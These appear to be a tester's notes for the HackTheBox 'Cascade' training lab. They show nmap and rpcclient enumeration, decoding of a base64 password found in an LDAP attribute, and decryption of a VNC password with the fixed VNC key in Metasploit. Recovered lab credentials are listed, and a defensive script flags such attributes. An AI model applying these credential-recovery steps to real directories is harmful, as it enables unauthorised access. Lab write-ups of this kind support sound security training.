HackTheBox · Lab
Cascade
NOTES
ENUMERATION
NMAP
```shell
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
49154/tcp open unknown
49155/tcp open unknown
49157/tcp open unknown
49158/tcp open unknown
49165/tcp open unknown
```
SMB anonymous authentication succeeds
RPCCLIENT
```shell
rpcclient $> enumdomusers
user:[CascGuest] rid:[0x1f5]
user:[arksvc] rid:[0x452]
user:[s.smith] rid:[0x453]
user:[r.thompson] rid:[0x455]
user:[util] rid:[0x457]
user:[j.wakefield] rid:[0x45c]
user:[s.hickson] rid:[0x461]
user:[j.goodhand] rid:[0x462]
user:[a.turnbull] rid:[0x464]
user:[e.crowe] rid:[0x467]
user:[b.hanson] rid:[0x468]
user:[d.burman] rid:[0x469]
user:[BackupSvc] rid:[0x46a]
user:[j.allen] rid:[0x46e]
user:[i.croft] rid:[0x46f]
rpcclient $> getdompwinfo
min_password_length: 5
```
WINDAPSEARCH (the full user dump exposes a non-standard cascadeLegacyPwd attribute on r.thompson)
```shell
windapsearch.py -U --full --dc-ip $IP | tee outputs/windapsearch.full
userPrincipalName: r.thompson@cascade.local
....SNIP....
cascadeLegacyPwd: clk0bjVldmE=
```
```shell
echo "clk0bjVldmE=" | base64 -d
rY4n5eva
```
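A defender-side audit of the same finding, added here as an example that is not part of the original notes: it parses LDIF-style output such as the windapsearch dump above and flags non-standard attributes whose values base64-decode to short, fully printable strings, which is exactly how cascadeLegacyPwd leaks a password. The two directory entries in SAMPLE are constructed.

```python
import base64
import re

# Constructed LDIF-style sample, modelled on the windapsearch dump in these notes.
SAMPLE = """\
dn: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local
userPrincipalName: r.thompson@cascade.local
sAMAccountName: r.thompson
cascadeLegacyPwd: clk0bjVldmE=

dn: CN=Steve Smith,OU=Users,OU=UK,DC=cascade,DC=local
userPrincipalName: s.smith@cascade.local
sAMAccountName: s.smith
objectGUID: 8p4gL3ZgEkqTlXRP5WoS7w==
"""

# Attributes that legitimately carry opaque binary and are skipped.
KNOWN_BINARY = {"objectguid", "objectsid", "usercertificate", "ntsecuritydescriptor", "jpegphoto"}
B64_RE = re.compile(r"^[A-Za-z0-9+/]{4,}={0,2}$")

def looks_like_secret(value):
    """Return the decoded text if value is base64 for a short, fully printable ASCII string, else None."""
    if not B64_RE.match(value):
        return None
    try:
        decoded = base64.b64decode(value, validate=True)
    except ValueError:  # bad padding or stray characters
        return None
    if not 4 <= len(decoded) <= 64 or not all(32 < b < 127 for b in decoded):
        return None
    return decoded.decode("ascii")

def find_suspicious_attributes(ldif_text):
    """Return (account, attribute, decoded) for every non-standard attribute that decodes to printable text."""
    findings = []
    for entry in ldif_text.strip().split("\n\n"):
        attrs = {}
        for line in entry.splitlines():
            if ": " in line:
                key, val = line.split(": ", 1)
                attrs.setdefault(key, val)  # first value of a multi-valued attribute is enough here
        account = attrs.get("sAMAccountName", attrs.get("dn", "?"))
        for key, val in attrs.items():
            if key == "dn" or key.lower() in KNOWN_BINARY:
                continue
            decoded = looks_like_secret(val)
            if decoded is not None:
                findings.append((account, key, decoded))
    return findings
```

Run it over a real `ldapsearch`/`windapsearch` dump to list accounts carrying such attributes; those values should be removed from the directory and the affected passwords rotated.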
TempAdmin: password is the same as the normal admin account password
FOOTHOLD
```shell
msf6 > irb
[*] Starting IRB shell...
[*] You are in the "framework" object
>> key = "\x17\x52\x6b\x06\x23\x4e\x58\x07"
=> "\x17Rk\x06#NX\a"
>> require 'rex/proto/rfb'
=> false
>> require 'rex/proto/rfb'
=> false
>> require 'rex/proto/rfb'
=> false
>> Rex::Proto::RFB::Cipher.decrypt(["6BCF2A4B6E5ACA0F"].pack('H*'), key)
=> "sT333ve2"
>>
```
sT333ve2
c4scadek3y654321
w3lc0meFr31nd
PRIVILEGE ESCALATION
SYSTEM OWNAGE
CLEANUP
WEB SERVICE TECHNOLOGY
WEB
NIKTO
WFUZZ / GOBUSTER
FILES
DIRS
SUBDIRS
VHOSTS
SCOPE
| IP | HOSTNAME | DOMAIN NAME | OS |
|---|---|---|---|
| 10.10.10.182 | CASC-DC1 | cascade.local | |
USERS
CREDENTIALS
```shell
r.thompson:rY4n5eva
```